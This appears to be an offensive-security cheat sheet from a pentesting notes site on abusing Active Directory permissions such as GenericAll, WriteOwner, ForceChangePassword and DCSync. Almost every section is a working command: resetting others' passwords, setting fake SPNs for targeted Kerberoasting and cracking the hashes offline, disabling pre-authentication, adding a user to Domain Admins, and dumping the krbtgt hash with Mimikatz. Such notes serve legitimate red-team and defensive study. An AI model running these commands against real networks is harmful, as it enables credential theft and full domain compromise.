ACLs Abuse

Generic All on User

If we have generic all right over a user object we can...

  1. Change that user's password. net user <username> <password> /domain

  2. Setup Targeted Kerberoasting by making that user kerberoastable by setting SPN on the account, kerberoasting it and cracking it offline

  • First Set SPN on that user object

Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}

  • Then Get Hash and crack

Rubeus.exe kerberoast /outfile:targetedhashes.txt 
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt

  1. Setup Targeted Asreproasting by disabling pre authentication on that user asreproasting it and cracking it offline

Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}

Generic All on Group

If we have generic all rights on a group example Domain Admins we can...

  1. Add ourselves to that group

net group "Domain Admins" myuser /add /domain

Generic write / Write on computer

If we have generic write or write property on a domain computer we can setup Resource Based Constrained Delegation and access the computer object. See Resource-Based-Constrained-Delegation.md section.

WriteProperty on Group

If our controlled user has WriteProperty right on All objects for Domain Admin group, We can again add ourselves to the Domain Admins group and escalate privileges:

Add-NetGroupUser -UserName myuser -GroupName "Domain Admins" -Domain "offense.local"

Self-Membership on group

If our user has Self-Membership property on a group we can add ourselves to that group

Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"

WriteProperty on group

If our user has WriteProperty property on a group we can add ourselves to that group

net group "domain admins" spotless /add /domain

ForceChangePassword on user

If we have ExtendedRight on User-Force-Change-Password object type, we can reset the user's password without knowing their current password:

  • Using PowerView

Set-DomainUserPassword -Identity targetuser -Verbose

  • Another method

$c = Get-Credential
Set-DomainUserPassword -Identity targetuser -AccountPassword $c.Password -Verbose

WriteOwner on Group

IF user in our control has WriteOwner on a group we can change the group's owner to our user, below the sid is the sid of domain admins group

Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "ouruser" -Verbose

GenericWrite on Group

This allows us to set new users (yourself for example) as members of the group

# Create creds
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd) 
# Add user to group
Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
# Check user was added
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
# Remove group member
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose

DCsync

IF we have dcsync rights we can use mimikatz to dump all hashes of user and computer objects

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
PreviousACLs DescriptionsNextACL

Last updated